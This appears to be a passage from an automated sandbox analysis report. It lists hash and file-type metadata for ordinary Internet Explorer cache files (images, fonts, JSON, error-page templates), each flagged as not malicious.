                                        SHA-512:EFBEFAF0D02828F7DBD070317BFDF442CAE516011D596319AE0AF90FC4C4BD9FF945AB6E6E0FF9C737D54E05855414386492D95ABFC610E7DE2E99725CB1A906
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .. {.. "name": "otFlat",.. "html": "
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\otPcCenter[2].json
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):47714
                                        Entropy (8bit):5.565687858735718
                                        Encrypted:false
                                        SSDEEP:768:4zg/3JXE9ZSqN76pW1lzZzic18+JHoQthI:4zCBceUdZzic18+5xI
                                        MD5:8EC5B25A65A667DB4AC3872793B7ACD2
                                        SHA1:6B67117F21B0EF4B08FE81EF482B888396BBB805
                                        SHA-256:F6744A2452B9B3C019786704163C9E6B3C04F3677A7251751AEFD4E6A556B988
                                        SHA-512:1EDC5702B55E20F5257B23BCFCC5728C4FD0DEB194D4AADA577EE0A6254F3A99B6D1AEDAAAC7064841BDE5EE8164578CC98F63B188C1A284E81594BCC0F20868
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .. {.. "name": "otPcCenter",.. "html": "
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\4996b9[2].woff
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:Web Open Font Format, TrueType, length 45633, version 1.0
                                        Category:dropped
                                        Size (bytes):45633
                                        Entropy (8bit):6.523183274214988
                                        Encrypted:false
                                        SSDEEP:768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
                                        MD5:A92232F513DC07C229DDFA3DE4979FBA
                                        SHA1:EB6E465AE947709D5215269076F99766B53AE3D1
                                        SHA-256:F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
                                        SHA-512:32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAKFpl8[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):585
                                        Entropy (8bit):7.555901519493306
                                        Encrypted:false
                                        SSDEEP:12:6v/7Zllj1AmzyaeU1glVfGHTT3H7LhChpt+ZnRE5b3Bz7Mf0Vg:S31hzm1GHTDbL0hpt+rE5bBY0Vg
                                        MD5:C423DAB40DA77CC7C42AF3324BFF1167
                                        SHA1:230F1E5C08932053C9EE8B169C533505C6CA5542
                                        SHA-256:3441B798B60989CF491AE286039CA4356D26E87F434C33DE47DC67C68E519E4B
                                        SHA-512:771F92666BE855C5692860F42EDB2E721E051AC1DC07FE7F1A228416375F196B444D82F76659FFF9877FD2483B26D1D6B64615803CA612BC9475BA3EE82A9E0D
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOfFRV[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                        Category:dropped
                                        Size (bytes):2754
                                        Entropy (8bit):7.844425834747859
                                        Encrypted:false
                                        SSDEEP:48:QfAuETA+wjpk5kCLsIZDP21yDvkDHCIY1x3pf7nM4kR1izuW3keUpEpso:Qf7EElWkCLjP21yADHCtx3pfyREj3kUN
                                        MD5:C830ED87471EDAE5A549A8374D0E44AA
                                        SHA1:ECCD1AD8688D25F74D6F9CDDEB938D0316DC5672
                                        SHA-256:D565D9A2812A5FF3057ECD3F8450174294FE18A604B5174B6808CFFFFE49155C
                                        SHA-512:4B72FC23FE713F9BD21E4B8077F99AAAE969749FF4DDA41B1C411E32D9F50C50B2B7141D82D5C305E1C181813FD3FA68E2E54402D3CAA3D9D14269528F97D2FD
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOfKbP[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                        Category:dropped
                                        Size (bytes):9208
                                        Entropy (8bit):7.93658004874926
                                        Encrypted:false
                                        SSDEEP:192:QoZjbcNMrOy2jZoc2apHaejRWSNIHxLf5T0yjPpWYcTxxx9e3rCA:btcC6D12C6SkVr5oylTUxI3rCA
                                        MD5:13E43269EC124CC169F9E7EAE844908C
                                        SHA1:0D953E27B371182B613648BF1BA585E268CA571E
                                        SHA-256:9F6AB9EF0637CBA274ADC44222A53F9D7314E6A73B722F501F2C8ADBF8C34180
                                        SHA-512:AFB631ACD7B3F71CAC612A0ED607CBF17C2B731A5A2C293711AFB29490E7ACE6C3D7EC78393D3225466A62E13B288141243A5F14D0FA0AB78401B1BE0F2C8D3C
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOfNp5[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                        Category:dropped
                                        Size (bytes):21488
                                        Entropy (8bit):7.956074967094666
                                        Encrypted:false
                                        SSDEEP:384:NK8ca6taiPAEHF8X/lQuWgJyiaHcwnI143gZ4UTuRavxmg4hBcm0n:Nv4l8PGuWCyiaELZdCk67y
                                        MD5:766190A0D6ACA6A6D464679662CF7E37
                                        SHA1:96B3FEF16953B6A65C61E9A10D94CAE57B60D901
                                        SHA-256:1538E167FBD736AD5A25A064C203D4A4AF609028171C2BC159CB546318D8986E
                                        SHA-512:E35464583A4AE460573C68460B15B9F0369AD11D7F4401A0F502EAB3FFCAD61B5E88F2CE1BF93AC3B2460D482A73A97D63D08E56A5105FA74DA8212A2FF34775
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgHFd[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                        Category:dropped
                                        Size (bytes):21510
                                        Entropy (8bit):7.93214218371982
                                        Encrypted:false
                                        SSDEEP:384:NJVagIW3hw0e48faTXMp8GwYja65bYSAPcHhAX1lMrLscTgRqDQpCy3wtf/jYqzh:NJkgIW048fqy8hYjHLA0HhcnqgkRhrYG
                                        MD5:D7C74F83DF0021841F6F9617790A0EF6
                                        SHA1:6E465534385ACAE8D6455957E69B157CECAC5634
                                        SHA-256:E3F4D729DECA7D45A33DD425174430FCE43F425F625187A1CB7717EE8D847B9E
                                        SHA-512:8238125680B90938A0C89DBF225861F4D780DB7B5BDA80B849CE54BF9A6CDFD8FF7910A9E2B9068CE4B78D59F949DDD0831585311DEBA23B1D70254B83D4212A
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgJ6C[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                        Category:dropped
                                        Size (bytes):9430
                                        Entropy (8bit):7.764531777068338
                                        Encrypted:false
                                        SSDEEP:192:Q2sGHXqF6UeKGo3/VvhzFYjSpwT5B9sYDlCLBoSvRqg5ej4zKiAUH0Y8:NsG3qHP5/VvZFYjVsYDluAg5ej4zJAew
                                        MD5:DA3EF5D61CFCF919A9B3C8244CF1A338
                                        SHA1:6D13CC7968F716BC4A4B44DA6B48D5C5156A2A82
                                        SHA-256:26783E83884E406E82D42417274A97129D68F717B29B64D844397BDDF412634C
                                        SHA-512:BF62219E2BD0B0D261594B1E9597E30C695B661AE3BC59F62CB4770FE0F9D3539063B23C4B9B357FF33C360AEDCAA2A13C228046BD5BBE66D2A591E3EA511C72
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgLVz[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                        Category:dropped
                                        Size (bytes):16649
                                        Entropy (8bit):7.922396366675045
                                        Encrypted:false
                                        SSDEEP:384:NA5v/9KF/LSZhyMDpqN6teoBMj+8sn+V5VaQmWjO:NA5ozSZhyBEYoBErsnEhmWK
                                        MD5:4035F9FD75175AB6DE70B4BDAD9A055B
                                        SHA1:7587562801349B57565E1992094B9704EC74EA0B
                                        SHA-256:BE74D2288FFD9CF5A34F65FF988A5C6ACD9273EFFFD62F875674B3A1DB1E6A2D
                                        SHA-512:5D429D4DA9598AB5FE06C74A55F549B7486C8D98E817455B6FAC487080DFD5A38A5CD828DDD77A35BA8E6249D440FFB0BCE02D936A76342DC4FB05569CD9181F
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgcCY[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                        Category:dropped
                                        Size (bytes):9028
                                        Entropy (8bit):7.9350546837322895
                                        Encrypted:false
                                        SSDEEP:192:QolvGgtNJQWCay/eOlV2ewOS3q/SlD+7ZtADA1CuO5EaHv:bXJEeOrvS3qalqZtADA1CuOqQ
                                        MD5:2D03D150765EA0FE3F5E0C06384CF7C1
                                        SHA1:F660B5FF7316F286CFF39EE9E9E986EB33CE9704
                                        SHA-256:198758ADC6AF0D2BC46D952FFE2ACB2B702D50643E263CE3E0F7C5FF240B10DB
                                        SHA-512:9FB6D545582786C6BA93A7179551903817DBCB65E92558FD06AF669FAEA3B13C1823DEE0EEE2FE97E669872D593BD78E484441F07BC0710E03482A949E0C0B34
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgez4[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                        Category:dropped
                                        Size (bytes):21892
                                        Entropy (8bit):7.955770750433599
                                        Encrypted:false
                                        SSDEEP:384:Ny8WEBvNCSVYaHHa5EKBPgd/qbvbUILLgEU4XC70WmmhPeVvcj5:Ny8bRNJVPKB4hqbvbdGuCYmN
                                        MD5:6819354E52C961069FDDF9DE793F5C33
                                        SHA1:9E0ED179F2053E59F0A481FA81FC78CB020B8C69
                                        SHA-256:F43FF336156026D7712CCBCC671E8E7F939325CF5A0F81C09BA0E53E17E9CE50
                                        SHA-512:BDBA5E43A5693EFCA81169F5C28D16FF7A17C2FC0682B3C7D5BA9B24916D95FC5381F6F3AF3FA03047BF997E69F650370FD498A17267EBC07E73FBE39F7497E2
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgg4w[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):34427
                                        Entropy (8bit):7.918466298596994
                                        Encrypted:false
                                        SSDEEP:768:I+HFDaHrcAEP0XopJxu7HSOGTD4GO23d7IGbKjfGZ:I+BaHTEP0+JxEHyDs23d8sKSZ
                                        MD5:8A893F65E7371978DBB67255A0EC14C2
                                        SHA1:E718E3AABA11B0D5879A00C27DAA901F93D2A7B5
                                        SHA-256:4DB575F619B4A904FA76FC2F85A217971B39FD20B61B3779C9D4FF6701984D44
                                        SHA-512:AD3D6E1A48D2F2E59B2516F563CB31E586BEE00C47F2B85E6B95D31ECDC77703FBA4E4A477EB5E4C98B3975195EBA296436DB03C25D49DEEEF774F886B13DF93
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgp9E[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                        Category:dropped
                                        Size (bytes):14628
                                        Entropy (8bit):7.959506953267804
                                        Encrypted:false
                                        SSDEEP:384:bwM39WfUCDAX42fh2ls85sV8AXQPTo7xpU3fxUw9:btIffD2th2lHiWxP6xpU35T
                                        MD5:BB5A568CDD23107E26783D614B7C47FE
                                        SHA1:F4FC12CAD2D2953D43A71D0729A352713237FC79
                                        SHA-256:1E37EC6DFDBEA9D1DC959A301B8A82094A0B908D411EBD2744A206EBDD4F4BFD
                                        SHA-512:B47604BEEFF49C5BADC79339AB6886760B21092FF1C5198D97C972E8AE50FFE56AB42D6FF3A14300726FF97B3928CFCC19E9B09A4094D3C63C7F77C6B7DB5FE0
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgvnc[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                        Category:dropped
                                        Size (bytes):13697
                                        Entropy (8bit):7.848115090089445
                                        Encrypted:false
                                        SSDEEP:192:Q2W3xN4uVWuPUZ3taz4XwR6SrWyBOvf/MWnxdmYpCgco83DCFxPoCOS1YAOHJpwt:NW3xN4u8yUZ3Iz4XwR/mmn2FxP4AO0zX
                                        MD5:F4EFBC68289CAF3A7B9073AF2E9E0BD1
                                        SHA1:46C041D8BBC0AF52E388432795B49D050E7A0A43
                                        SHA-256:4EB34F73471CABFCBC78439D42AF69831807D25F5ACD8151559BED13139D8DE1
                                        SHA-512:BE7E716E94EF3FC30C33D62EE15851E0F7CF635197901C088446AEB3F2B1BF8CC20F7D5B4C2F055A478EB3E622ABE981C0CC3754C0B144E485D5ADC79D0B36A3
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAzb5EX[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):322
                                        Entropy (8bit):6.966129933463651
                                        Encrypted:false
                                        SSDEEP:6:6v/lhPahmKxf8jCAw4DGQJe1kvnxIekdOgcKOtQExGTFDDv4bp:6v/7IxkjyzQEyaI1QmGTlW
                                        MD5:89E1141C659F2127DD80809F71326697
                                        SHA1:3262110C91000071FDBB0D33893EC1EC8026ADEC
                                        SHA-256:98763AAD3E2B7507E7729711ACD2DACCBD56164FE6DDB10410047B212275C279
                                        SHA-512:1D32DF0DB191F0A3FA152BC47F5F463234224F215A283A26E4EBAF95095A0977ABF5B9D9804FA4DDB276CA8DAE2865789802BB8A18B02B232A9DBB22D5F19E49
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1cG73h[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):1131
                                        Entropy (8bit):7.767634475904567
                                        Encrypted:false
                                        SSDEEP:24:lGH0pUewXx5mbpLxMkes8rZDN+HFlCwUntvB:JCY9xr4rZDEFC
                                        MD5:D1495662336B0F1575134D32AF5D670A
                                        SHA1:EF841C80BB68056D4EF872C3815B33F147CA31A8
                                        SHA-256:8AD6ADB61B38AFF497F2EEB25D22DB30F25DE67D97A61DC6B050BB40A09ACD76
                                        SHA-512:964EE15CDC096A75B03F04E532F3AA5DCBCB622DE5E4B7E765FB4DE58FF93F12C1B49A647DA945B38A647233256F90FB71E699F65EE289C8B5857A73A7E6AAC6
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1ftEY0[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):497
                                        Entropy (8bit):7.316910976448212
                                        Encrypted:false
                                        SSDEEP:12:6v/7YEtTvpTjO7q/cW7Xt3T4kL+JxK0ew3Jw61:rEtTRTj/XtjNSJMkJw61
                                        MD5:7FBE5C45678D25895F86E36149E83534
                                        SHA1:173D85747B8724B1C78ABB8223542C2D741F77A9
                                        SHA-256:9E32BF7E8805F283D02E5976C2894072AC37687E3C7090552529C9F8EF4DB7C6
                                        SHA-512:E9DE94C6F18C3E013AB0FF1D3FF318F4111BAF2F4B6645F1E90E5433689B9AE522AE3A899975EAA0AECA14A7D042F6DF1A265BA8BC4B7F73847B585E3C12C262
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1kc8s[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):893
                                        Entropy (8bit):7.702979580339968
                                        Encrypted:false
                                        SSDEEP:24:5yrGVrpvzYKWJzgT7w2CGZi1/BwIBCHL/P:srG1pLYPJzY7w/G4OIKLH
                                        MD5:CD8DFD7D16B4BA3E2873EE06DB780B06
                                        SHA1:E8A79F0671D287E116C76FAA5F0E8A4099E0BD23
                                        SHA-256:88E6642487D0F944C6A020133CAE030781CFDCB518802419F10AD78937BDA6DF
                                        SHA-512:199AA29EF33317A43D1C6DF434DD5F9D0FF54BF363CCB1948A970C7EC6889B083565E85E0A140FCDFC38B675CA3EB24DEA0659897EF0450CEF43444E1CEFDA8B
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BBZ3zrM[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):763
                                        Entropy (8bit):7.621723844116318
                                        Encrypted:false
                                        SSDEEP:12:6v/7N5fvaQCJmEzDuMi5ld08fuKGi9o4eUTE5xDgic9NEm652PPanadeh7jteQ8c:IBihmEGMi5ltfDPu4E5iic9NEp52kl9
                                        MD5:CFE739AEAE33DC7C7BB02D24E081F0CE
                                        SHA1:CBE000F23A34635EF4518C919A234DC4A3635C1E
                                        SHA-256:A1F6D07C79B387A99C2550B0E24AD030964EB42ACBA18F21F2D790A05499BAF3
                                        SHA-512:E8CD4F90716E62E4A0A8B9817794F55517CA52EC75F634E55462BBFDFB288076C1992298DB5578C84EC695D3B23BE6FF1AD80EDEEBA8435AAF96B6B32C711C5D
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\NewErrorPageTemplate[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):3224
                                        Entropy (8bit):4.869554560514657
                                        Encrypted:false
                                        SSDEEP:48:5m73jcJqQep89TEw7UxkZCm73jcJqQep89TEw7Uxkk:5nqrehEw7U6ZCnqrehEw7U6k
                                        MD5:3A35614D9A6156057F7D30C91C1ED4F2
                                        SHA1:7DDE5D14A15F465C9BFD0B0C0B3416175E69D1BC
                                        SHA-256:D544FAC44B7B2CD937726C401B5C9C726F900CEF22980A7B39F8756581901B73
                                        SHA-512:8A31C0C90EF443E3B7AC5B930466CD8CEF1D540D2D436A7DC4D12F38686368303882A9610A57B2A1CF9AB973DB684FDA0B1831B116EAEB4D86BE816FDD627C28
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\cfdbd9[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):740
                                        Entropy (8bit):7.552939906140702
                                        Encrypted:false
                                        SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                        MD5:FE5E6684967766FF6A8AC57500502910
                                        SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                        SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                        SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[2].htm
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, ASCII text, with very long lines
                                        Category:dropped
                                        Size (bytes):21628
                                        Entropy (8bit):5.304819777739522
                                        Encrypted:false
                                        SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                        MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                        SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                        SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                        SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[3].htm
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, ASCII text, with very long lines
                                        Category:dropped
                                        Size (bytes):21628
                                        Entropy (8bit):5.304819777739522
                                        Encrypted:false
                                        SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                        MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                        SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                        SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                        SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[4].htm
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, ASCII text, with very long lines
                                        Category:dropped
                                        Size (bytes):21628
                                        Entropy (8bit):5.304819777739522
                                        Encrypted:false
                                        SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                        MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                        SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                        SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                        SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\de-ch[2].json
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):79097
                                        Entropy (8bit):5.337866393801766
                                        Encrypted:false
                                        SSDEEP:768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
                                        MD5:408DDD452219F77E388108945DE7D0FE
                                        SHA1:C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
                                        SHA-256:197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
                                        SHA-512:17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\dnserror[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2997
                                        Entropy (8bit):4.4885437940628465
                                        Encrypted:false
                                        SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                        MD5:2DC61EB461DA1436F5D22BCE51425660
                                        SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                        SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                        SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\down[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):748
                                        Entropy (8bit):7.249606135668305
                                        Encrypted:false
                                        SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                        MD5:C4F558C4C8B56858F15C09037CD6625A
                                        SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                        SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                        SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\httpErrorPagesScripts[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):12105
                                        Entropy (8bit):5.451485481468043
                                        Encrypted:false
                                        SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                        MD5:9234071287E637F85D721463C488704C
                                        SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                        SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                        SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                        Malicious:false
